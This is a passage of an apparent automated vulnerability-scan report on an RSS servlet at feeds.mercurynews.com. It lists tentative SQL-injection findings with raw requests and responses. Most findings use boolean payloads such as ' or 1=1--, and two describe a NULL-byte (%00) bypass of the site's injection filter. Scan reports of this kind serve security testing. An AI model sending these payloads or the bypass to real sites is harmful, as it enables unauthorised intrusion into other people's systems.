Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:27 GMT
Content-Length: 0
Connection: close


1.72. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200902.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200902.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11517556'%20or%201%3d1--%20 and 11517556'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d1--%20/568/200902.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:44 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d2--%20/568/200902.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:44 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.73. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200906.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200906.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200906.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200906.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:41 GMT
Content-Length: 0
Connection: close


1.74. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200907.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 31633381'%20or%201%3d1--%20 and 31633381'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi31633381'%20or%201%3d1--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:10 GMT
Date: Tue, 07 Dec 2010 23:21:10 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi31633381'%20or%201%3d2--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.75. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200907.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:20 GMT
Content-Length: 0
Connection: close


1.76. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200908.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200908.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200908.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:39 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200908.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:39 GMT
Content-Length: 0
Connection: close


1.77. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200909.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200909.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200909.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:07 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200909.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:07 GMT
Content-Length: 0
Connection: close


1.78. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200910.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200910.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:06 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:06 GMT
Date: Tue, 07 Dec 2010 23:21:06 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.79. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200911.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16915327'%20or%201%3d1--%20 and 16915327'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi16915327'%20or%201%3d1--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:06 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi16915327'%20or%201%3d2--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:06 GMT
Date: Tue, 07 Dec 2010 23:22:06 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.80. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200911.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18682428'%20or%201%3d1--%20 and 18682428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d1--%20/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d2--%20/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:13 GMT
Content-Length: 0
Connection: close


1.81. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200912.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200912.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11169924'%20or%201%3d1--%20 and 11169924'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d1--%20/568/200912.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d2--%20/568/200912.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
